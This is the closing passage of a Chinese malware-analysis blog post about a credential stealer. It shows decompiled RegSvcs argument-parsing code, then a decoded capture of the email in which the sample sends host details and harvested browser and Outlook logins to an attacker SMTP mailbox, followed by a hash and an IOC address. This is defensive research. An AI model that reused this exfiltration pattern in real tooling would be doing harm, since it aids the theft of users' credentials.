        }
        if (num == 1)
        {
            RegSvcs.regConfig.AssemblyFile = args[i];
            return;
        }
        if (num == 2)
        {
            RegSvcs.regConfig.AssemblyFile = args[i];
            RegSvcs.regConfig.Application = args[i + 1];
            RegSvcs.regConfig.TypeLibrary = null;
            return;
        }
        if (num == 3)
        {
            RegSvcs.regConfig.AssemblyFile = args[i];
            RegSvcs.regConfig.Application = args[i + 1];
            RegSvcs.regConfig.TypeLibrary = args[i + 2];
            return;
        }
        throw new UsageException(1, Resource.FormatString("RegSvcs_ToManyArgs"));
    }
    // Token: 0x04000002 RID: 2
    private const int MAX_PATH = 260; // Win32 path limit; FindAssembly sizes its buffer at MAX_PATH + 1
    // Token: 0x04000003 RID: 3
    private static RegistrationConfig regConfig = new RegistrationConfig(); // shared state filled by ParseArguments and passed by ref to the helper
    // Token: 0x04000004 RID: 4
    private static bool logoOutput; // print the banner (cleared by /nologo and /quiet)
    // Token: 0x04000005 RID: 5
    private static bool successOutput; // print success messages (cleared by /quiet)
    // Token: 0x04000006 RID: 6
    private static bool uninstallApplication; // set by /u
}
看了一下连接信息:
先发送了一个Auth的请求头进行验证
解码:info@stankovic.hr
验证成功后会收集本机信息进行上传(发送到邮箱)
MIME-Version: 1.0
From: info@stankovic.hr
To: info@stankovic.hr
Date: 28 Jul 2020 20:46:04 +0100
Subject: PW_admin/USER-PC
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: quoted-printable
Time: 07/28/2020 20:45:57
User Name: admin
Computer Name: U=
SER-PC
OSFullName: Microsoft Windows 7 Professional
CPU: I=
ntel(R) Core(TM) i5-6400 CPU @ 2.70GHz
RAM: 3583.61 MB
<hr>=
URL:192.168.1.1
0D=0AUsername:honey@pot.com
0D=0APassword=
:honeypass356
0D=0AApplication:Outlook
0D=0A<hr>=0D=0AURL=
:https://m.facebook.com/
0D=0AUsername:honey@pot.com
0D=0A=
Password:honeypass356
0D=0AApplication:Chrome
0D=0A<hr>=0D=0A=
URL:https://m.facebook.com
0D=0AUsername:honey@pot.com
0D=0A=
Password:honeypass356
0D=0AApplication:Firefox
0D=0A<hr>=0D=0A
还有一些功能需要详细分析,感觉需要HOOK才能更好地分析……
MD5:1A25E75693B99AD09E55AEA29C6F2775
IOC:
89.201.175.36
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:某cs读取资源文件样本执行分析
本文作者:九世
发布时间:2021-04-14, 08:27:03
最后更新:2021-04-14, 08:44:35
原始链接:http://jiushill.github.io/posts/a98e0b02.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。